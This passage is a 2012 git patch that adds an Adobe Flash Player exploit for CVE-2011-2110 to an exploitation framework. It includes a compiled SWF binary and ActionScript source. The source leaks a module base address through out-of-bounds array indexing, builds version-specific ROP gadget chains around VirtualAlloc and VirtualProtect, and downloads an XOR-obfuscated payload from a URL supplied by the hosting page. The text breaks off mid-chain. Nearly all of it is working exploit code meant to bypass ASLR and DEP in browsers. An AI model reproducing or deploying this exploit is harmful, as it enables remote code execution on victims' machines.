From fcf42d3e7bcb1bc79308ca8396154dffc4f4083f Mon Sep 17 00:00:00 2001
From: Steven Seeley <steventhomasseeley@gmail.com>
Date: Wed, 20 Jun 2012 12:52:37 +1000
Subject: [PATCH] added adobe flashplayer array indexing exploit
 (CVE-2011-2110)

---
 data/exploits/CVE-2011-2110.swf               | Bin 0 -> 4615 bytes
 .../exploits/CVE-2011-2110/CVE-2011-2110.as   | 558 ++++++++++++++++++
 .../adobe_flashplayer_arrayindexing.rb        | 178 ++++++
 3 files changed, 736 insertions(+)
 create mode 100644 data/exploits/CVE-2011-2110.swf
 create mode 100644 external/source/exploits/CVE-2011-2110/CVE-2011-2110.as
 create mode 100644 modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb

diff --git a/data/exploits/CVE-2011-2110.swf b/data/exploits/CVE-2011-2110.swf
new file mode 100644
index 0000000000000000000000000000000000000000..f9c79b5a60f01fd138db04800c022a715080e418
GIT binary patch
literal 4615
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

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2011-2110/CVE-2011-2110.as b/external/source/exploits/CVE-2011-2110/CVE-2011-2110.as
new file mode 100644
index 0000000000..b52ef92520
--- /dev/null
+++ b/external/source/exploits/CVE-2011-2110/CVE-2011-2110.as
@@ -0,0 +1,558 @@
+/*
+ * poc exploit for CVE-2011-2110
+ * thanks to AR Team (http://www.accessroot.com/arteam/site/download.php?view.331)
+ * modified & verified safe code by mr_me - steventhomasseeley@gmail.com
+ * bypasses aslr/dep
+ * tested against IE/FF under WINXP/VISTA/WIN7
+ * 19/6/2012
+ */
+
+package
+{
+	
+	import flash.display.*;
+	import flash.events.*;
+	import flash.external.*;
+	import flash.net.*;
+	import flash.system.*;
+	import flash.utils.*;
+
+	// Main class
+	public class Main extends MovieClip
+	{
+		public var content:ByteArray;
+		public var pobj:uint;
+		public var code:ByteArray;
+		public var baseaddr:uint;
+		public var content_len:uint;
+		public var xchg_eax_esp_ret:uint;
+		public var xchg_eax_esi_ret:uint;
+		public var pop_eax_ret:uint;
+		public var VirtualAlloc:uint;
+		public var jmp_eax:uint;
+		public var pop_ecx:uint;
+		public var mov_eax_ecx:uint;
+		public var inc_eax_ret:uint;
+		public var dec_eax_ret:uint;
+		public var to_eax:uint;
+		public var virtualprotect:uint;
+
+		// Main function
+		public function Main()
+		{
+			var i:uint;
+			var loader:URLLoader;
+			var onLoadComplete:Function;
+
+			// callback called when the download event is complete
+			onLoadComplete = function (event:Event) : void
+			{
+				content = loader.data;	
+				i = 0;
+				while (i < content.length)
+				{
+					// every byte of the file is XORed with 122
+					content[i] = content[i] ^ 122;
+					var _loc_4:* = i + 1;
+					i = _loc_4;
+				}
+				
+				// then, the data is decompressed using zlib
+				content.uncompress();
+				content_len = content.length;
+				
+				var _loc_2:* = new ByteArray();
+				code = _loc_2;
+				_loc_2.position = 1024 * 1024;
+				_loc_2.writeInt(2053274210);
+				_loc_2.writeInt(2053339747);
+				_loc_2.writeInt(2053405283);
+				_loc_2.writeObject(_loc_2);
+				exploit(_loc_2, _loc_2);
+				
+				// needed for stack alignment
+				trace(_loc_2.length);
+				return;
+			}
+
+			var param:* = root.loaderInfo.parameters;
+			
+			// Reads the "info" parameter from the HTML page
+			var t_url:* = this.hexToBin(param["info"]);
+
+			// Decode the URL in the "info" parameter
+			while (i < t_url.length)
+			{
+				t_url[i] = t_url[i] ^ 122;
+				i = (i + 1);
+			}
+
+			// Decompress the data using zlib
+			t_url.uncompress();
+			
+			// setup the error 
+			var error_arr:* = new ByteArray();
+			error_arr.writeByte(2053208673);
+			error_arr.writeObject(error_arr);
+			
+			// Takes the userAgent from the request
+			var browser:* = ExternalInterface.call("eval", "navigator.userAgent");
+
+			// we only target IE and FF...
+			if (!(browser.toLowerCase().indexOf("msie") > 0 || browser.toLowerCase().indexOf("firefox") > 0))
+			{
+				// Error!
+				error_arr.uncompress();
+			}
+
+			// If it is a 64 bits process or is embedded in a PDF or if the Flash version is an un-official version (debug version)
+			// http://help.adobe.com/en_US/AS2LCR/Flash_10.0/00000896.html
+			if (Capabilities.isDebugger || Capabilities.supports64BitProcesses || Capabilities.isEmbeddedInAcrobat)
+			{
+				// Error!
+				error_arr.uncompress();
+			}
+
+			// Create the URLDownloader object
+			var url_str:* = String(t_url);
+			loader = new URLLoader();
+			loader.dataFormat = URLLoaderDataFormat.BINARY;
+			loader.addEventListener(Event.COMPLETE, onLoadComplete);
+			loader.load(new URLRequest(t_url.toString()));
+			return;
+		}
+
+		// Converts from an hex string to binary representation
+		public function hexToBin(param1:String) : ByteArray
+		{
+			var _loc_2:String = null;
+			var _loc_3:* = new ByteArray();
+			var _loc_4:* = param1.length;
+			var _loc_5:uint = 0;
+			_loc_3.endian = Endian.LITTLE_ENDIAN;
+			while (_loc_5 < _loc_4)
+			{   
+				_loc_2 = param1.charAt(_loc_5) + param1.charAt((_loc_5 + 1));
+				_loc_3.writeByte(parseInt(_loc_2, 16));
+				_loc_5 = _loc_5 + 2;
+			}
+			return _loc_3;
+		}
+
+		// the exploitation function
+		public function exploit(... args) : void
+		{
+			var _loc_8:uint = 0;
+
+			// First leak
+			// this leak gets the baseaddress of Flash10s.ocx
+			var n1:Number= new Number(parseFloat(String(args[1073741841])));
+			var _loc_3:* = new ByteArray();
+			_loc_3.position = 0;
+			_loc_3.writeDouble(n1);
+			var _loc_4:* = _loc_3[0] * 16777216 + _loc_3[1] * 65536 + _loc_3[2] * 256 + _loc_3[3];
+
+			// Base address
+			this.baseaddr = _loc_4;
+			this.code.position = 0;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeInt((this.pobj - 1) + 16 + 1024 * 4 * 100);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.writeUnsignedInt(0x41424344);
+			this.code.writeUnsignedInt(0x41424344);
+			this.code.writeUnsignedInt(0x45464748);
+
+			// With this loop, we store the 0x41414141 in the stack
+			_loc_8 = 0;
+			while (_loc_8 < 1024 * 100)
+			{
+				this.code.writeUnsignedInt(0x41414141);
+				_loc_8 = _loc_8 + 1;
+			}
+
+			// Test for the vulnerable versions of Flash
+			// Different test are done to calculate the ROP gadgets for every vulnerable version
+			if (Capabilities.version.toLowerCase() == "win 10,3,181,14" || Capabilities.version.toLowerCase() == "win 10,3,181,22" || Capabilities.version.toLowerCase() == "win 10,3,181,23")
+			{
+				if (Capabilities.version.toLowerCase() == "win 10,3,181,14")
+				{
+					if (Capabilities.playerType.toLowerCase() == "activex")
+					{
+						this.xchg_eax_esp_ret = this.baseaddr - 4147053;
+						this.xchg_eax_esi_ret = this.baseaddr - 3142921;
+						this.pop_eax_ret = this.baseaddr - 4217672;
+						this.VirtualAlloc = this.baseaddr + 681970 + 52;
+						this.jmp_eax = this.baseaddr - 4189983;
+						this.pop_ecx = this.baseaddr - 4217760;
+						this.mov_eax_ecx = this.baseaddr - 3903324;
+						this.inc_eax_ret = this.baseaddr - 4217676;
+						this.dec_eax_ret = this.baseaddr - 3914790;
+						this.to_eax = this.baseaddr - 3857175;
+						this.virtualprotect = this.baseaddr + 681970;
+					}
+					if (Capabilities.playerType.toLowerCase() == "plugin")
+					{
+						this.xchg_eax_esp_ret = this.baseaddr - 4070001;
+						this.xchg_eax_esi_ret = this.baseaddr - 3066633;
+						this.pop_eax_ret = this.baseaddr - 4140104;
+						this.VirtualAlloc = this.baseaddr + 681682;
+						this.jmp_eax = this.baseaddr - 4112415;
+						this.pop_ecx = this.baseaddr - 4140192;
+						this.mov_eax_ecx = this.baseaddr - 3826124;
+						this.inc_eax_ret = this.baseaddr - 4140108;
+						this.dec_eax_ret = this.baseaddr - 3988570;
+						this.to_eax = this.baseaddr - 3779959;
+						this.virtualprotect = this.baseaddr + 681434;
+					}
+					if (!(Capabilities.playerType.toLowerCase() == "plugin" || Capabilities.playerType.toLowerCase() == "activex"))
+					{
+						this.code.uncompress();
+					}
+				}
+				if (Capabilities.version.toLowerCase() == "win 10,3,181,22")
+				{
+					if (Capabilities.playerType.toLowerCase() == "activex")
+					{
+						this.code.uncompress();
+					}
+					if (Capabilities.playerType.toLowerCase() == "plugin")
+					{
+						this.xchg_eax_esp_ret = this.baseaddr - 4070081;
+						this.xchg_eax_esi_ret = this.baseaddr - 3066633;
+						this.pop_eax_ret = this.baseaddr - 4140184;
+						this.VirtualAlloc = this.baseaddr + 681602;
+						this.jmp_eax = this.baseaddr - 4112495;
+						this.pop_ecx = this.baseaddr - 4140272;
+						this.mov_eax_ecx = this.baseaddr - 3826412;
+						this.inc_eax_ret = this.baseaddr - 4140188;
+						this.dec_eax_ret = this.baseaddr - 3988622;
+						this.to_eax = this.baseaddr - 3780231;
+						this.virtualprotect = this.baseaddr + 681354;
+					}
+					if (!(Capabilities.playerType.toLowerCase() == "plugin" || Capabilities.playerType.toLowerCase() == "activex"))
+					{
+						this.code.uncompress();
+					}
+				}
+				if (Capabilities.version.toLowerCase() == "win 10,3,181,23")
+				{
+					if (Capabilities.playerType.toLowerCase() == "activex")
+					{
+						this.xchg_eax_esp_ret = this.baseaddr - 4147431;
+						this.xchg_eax_esi_ret = this.baseaddr - 3143049;
+						this.pop_eax_ret = this.baseaddr - 4218184;
+						this.VirtualAlloc = this.baseaddr + 681510;
+						this.jmp_eax = this.baseaddr - 4190495;
+						this.pop_ecx = this.baseaddr - 4218272;
+						this.mov_eax_ecx = this.baseaddr - 3903692;
+						this.inc_eax_ret = this.baseaddr - 4218188;
+						this.dec_eax_ret = this.baseaddr - 3915158;
+						this.to_eax = this.baseaddr - 3857511;
+						this.virtualprotect = this.baseaddr + 681458;
+					}
+					if (Capabilities.playerType.toLowerCase() == "plugin")
+					{
+						this.code.uncompress();
+					}
+					if (!(Capabilities.playerType.toLowerCase() == "plugin" || Capabilities.playerType.toLowerCase() == "activex"))
+					{
+						this.code.uncompress();
+					}
+				}
+			}
+			else
+			{	
+				this.code.uncompress();
+			}
+
+			// rop
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt((this.inc_eax_ret + 1));
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.pop_ecx);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.xchg_eax_esp_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.xchg_eax_esi_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.pop_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.VirtualAlloc);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.jmp_eax);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.pop_ecx);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(0);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(131072);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(4096);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(64);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.writeUnsignedInt(2421721856);
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.mov_eax_ecx);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.inc_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.inc_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.inc_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.inc_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.pop_ecx);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.writeUnsignedInt(1435233421);
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.mov_eax_ecx);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.inc_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.inc_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.inc_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.inc_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.pop_ecx);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.writeUnsignedInt(1074135008);
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.mov_eax_ecx);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.inc_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.inc_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.inc_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.inc_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.dec_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
+			this.code.writeUnsignedInt(this.dec_eax_ret);
+			this.code.endian = Endian.BIG_ENDIAN;
+			this.code.endian = Endian.LITTLE_ENDIAN;
